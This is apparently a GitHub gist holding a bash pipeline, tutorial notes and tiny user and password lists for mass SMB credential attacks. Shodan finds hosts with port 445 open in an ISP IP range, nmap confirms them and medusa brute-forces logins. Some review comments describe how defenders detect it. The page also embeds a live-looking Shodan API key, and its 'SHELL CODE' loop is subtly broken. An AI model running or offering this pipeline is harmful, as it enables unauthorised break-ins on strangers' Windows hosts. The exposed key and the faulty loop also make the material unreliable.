Last active
June 29, 2019 18:13
pzscript
# One-line wrapper around the three stages listed in the notes file of this gist
# (Shodan lookup -> nmap check of TCP/445 -> medusa smbnt password guessing).
# Flow, as written:
#   - reads one line into get_num; after tr turns '-' into a space, the regex
#     accepts one or more pairs of dotted-quad IPv4 addresses separated by a
#     single space, so the prompt's word "number" really means an IP range;
#   - on a match: removes the previous working files, downloads password.txt and
#     user.txt from raw gist URLs pinned to revision hashes, runs apt-get update,
#     pip install shodan, shodan init, and installs medusa and nmap through sudo;
#   - fp/sp/ep are cut from the accepted input (fields 1, 2 and 5 split on '.'),
#     and the loop queries Shodan once per /16 from sp to ep;
#   - the final grep keeps the lines of finds.txt that contain "Allowed".
# NOTE(review): the Shodan API key is embedded in this public file as a literal;
# a key published this way is readable by anyone who opens the page and should
# be treated as exposed (revoke/rotate it, and load keys from the environment).
# NOTE(review): pip install and the sudo apt-get installs pull unpinned packages
# as part of the same line, so running it changes the host before any check of
# what is being installed.
# NOTE(review): defenders typically see the nmap stage as one source touching
# TCP/445 on many addresses in a short time, and the medusa stage as bursts of
# failed network logons (Windows Security event 4625, logon type 3) for the
# account names in user.txt.
unset get_num ;echo "Please enter in a number:" ;read get_num; if [[ ! `echo ${get_num} | tr '-' ' '` =~ ^((((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?) (25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))))+$ ]] ;then echo "${get_num} isn't a number" ; else echo "${get_num} is a number" && sleep 5 && iprange=`echo ${get_num}` ; rm user.txt password.txt shodan.txt out.txt nmap.txt && sleep 5 && wget https://gist.githubusercontent.com/pouriazareie/b5d3a2321747599a3a65edd8c929a400/raw/7311e4f12bc6dc839d8b0621d5d4de12a3c15e7d/password.txt && wget https://gist.githubusercontent.com/pouriazareie/b5d3a2321747599a3a65edd8c929a400/raw/b77dc6b6b8ca34024c58a64527b344b752f1fa71/user.txt && sleep 1 && sudo apt-get update && pip install shodan && shodan init 0BF9d6blgU0zOV3rnScJtr4C5pRwSet9 && sudo apt-get install medusa -y && sudo apt-get install nmap -y && fp=`echo "$iprange" | cut -d. -f1` ;sp=`echo "$iprange" | cut -d. -f2` ; ep=`echo "$iprange" | cut -d. -f5` ; while [ $sp -le $ep ];do shodan search --fields ip_str,port:445 smb net:$fp.$sp.0.0/16 ;((sp++));done | tee -a shodan.txt && sort shodan.txt | awk '{$1=$1}1' | sed '/^$/d' | tee -a out.txt && nmap -Pn -T5 --open -p 445 -iL out.txt -oG - | grep "/open" | awk '{print $2}' | tee -a nmap.txt && medusa -w 0 -H nmap.txt -U user.txt -P password.txt -M smbnt -O finds.txt -T 16 && echo find this && clear && colorfind=`cat finds.txt | grep Allowed | cut -d " " -f1,2,5,7,9` && echo -e "\e[45m$colorfind\e[0m" ; fi |
123456 | |
1 | |
123 | |
1234 |
# Multi-line form of the same three stages: Shodan lookup, nmap check of
# TCP/445, then medusa smbnt password guessing with the two downloaded lists.
# The trailing " | |" on each line is residue of the page's table layout.
# The two word lists come from raw gist URLs pinned to revision hashes.
wget https://gist.githubusercontent.com/pouriazareie/b5d3a2321747599a3a65edd8c929a400/raw/7311e4f12bc6dc839d8b0621d5d4de12a3c15e7d/password.txt && wget https://gist.githubusercontent.com/pouriazareie/b5d3a2321747599a3a65edd8c929a400/raw/b77dc6b6b8ca34024c58a64527b344b752f1fa71/user.txt | |
# -----------------------------------> iprange=2.176.0.0 - 2.191.255.255 | |
fp=2 #----------- first part of ipranges : 2 | |
sp=176 #----------- start point of ipranges : 176 | |
ep=191 #----------- end point of ipranges : 191 | |
# Stage 1: one Shodan query per /16 from sp to ep, appended to shodan.txt.
# Nothing is sent to the listed hosts here; an address shows up because
# TCP/445 was reachable from the Internet when Shodan last indexed it, which
# is why filtering inbound 445 at the perimeter removes a host from this stage.
while [ $sp -le $ep ] | |
do shodan search --fields ip_str,port:445 smb net:$fp.$sp.0.0/16 | |
((sp++)) | |
done | tee -a shodan.txt | |
# Normalises whitespace and drops empty lines; tee -a appends, so out.txt
# accumulates across runs.
sort shodan.txt | awk '{$1=$1}1' | sed '/^$/d' | tee -a out.txt | |
# Stage 2: nmap re-checks TCP/445 on the addresses in out.txt and keeps the
# ones reported open in nmap.txt. On the network side this typically appears
# as a single source touching port 445 on many addresses in a short time.
nmap -Pn -T5 --open -p 445 -iL out.txt -oG - | grep "/open" | awk '{print $2}' | tee -a nmap.txt | |
# Stage 3: medusa's smbnt module tries the names in user.txt with the
# passwords in password.txt against every host in nmap.txt and writes results
# to finds.txt. On Windows hosts the failed attempts are typically recorded as
# Security event 4625 (logon type 3); account lockout and a password policy
# that rejects entries such as those in password.txt blunt this stage.
medusa -w 0 -H nmap.txt -U user.txt -P password.txt -M smbnt -O finds.txt -T 16 |
*) search targets by shodan | |
*) check the hosts in shodan.txt with nmap (because the Shodan database may be out of date) | |
*) brute force nmap output by medusa | |
------------------------------------------------------------------------------------------------------------------------------------------ | |
You can manually run command or use easier way by writing a shell code | |
---------------------------------------------------------------------------------------------------------------------------------------- | |
1) first we must create shodan account to and get API KEY | |
(open link and registered an account (you can login whit your google account) | |
(follow me step by step) | |
(after login go on my account tab and click it now copy API KEY) | |
______________________________________________________________________________ | |
2) choice on target or scan ip range (offer:use databse iprange country in nirsoft.net) | |
im first sort ips by total ips in ISP then select iprange for example | |
iprange=2.176.0.0 - 2.191.255.255 | |
use cidr netmask=2.176.0.0/16 ===>>> (2.176.0.0 ~ 2.176.255.255) | |
--------------------------------------------------------------------------------------------------------------------------------------------------- | |
command: | |
apt-get update | |
apt-get install update | |
apikey="0BF9d6blgU0zOV3rnScJtr4C5pRwSet9" | |
pip install shodan && shodan init $apikey | |
shodan search --fields ip_str,port:445 smb net:2.176.0.0/16 | tee -a "shodan.txt" | |
sort shodan.txt | awk '{$1=$1}1' | sed '/^$/d' | tee -a "sort.txt" | |
nmap -Pn -T5 --open -p 445 -iL "sort.txt" -oG - | grep "/open" | awk '{print $2}' | tee -a "nmap.txt" | |
medusa -w 0 -H "nmap.txt" -U user1.txt -P p10.txt -M smbnt -O "find.txt" -T 16 | |
_____________________________________________________________________________________- | |
----------------------------------------------------- | |
iprange=2.176.0.0 - 2.191.255.255 | |
iprange=2.$a.0.0 - 2.$b.255.255 | |
----------------------------------------------------- | |
SHELL CODE | |
-------------------------------------------------------- | |
a=176 | |
b=191 | |
while [ $b -le $b ] | |
do | |
shodan search --fields ip_str,port:445 smb net:$a.$b.0.0/16 | |
((b++)) | |
done | tee -a shodan.txt | |
sort shodan.txt | awk '{$1=$1}1' | sed '/^$/d' | tee -a out.txt | |
nmap -Pn -T5 --open -p 445 -iL out.txt -oG - | grep "/open" | awk '{print $2}' | tee -a nmap.txt | |
medusa -w 0 -H nmap.txt -U user1.txt -P p10.txt -M smbnt -O finds.txt -T 16 | |
---------------------------------------------------------------------------------------------------- | |
administrator | |
user | |
user1 | |
admin | |
admin1 |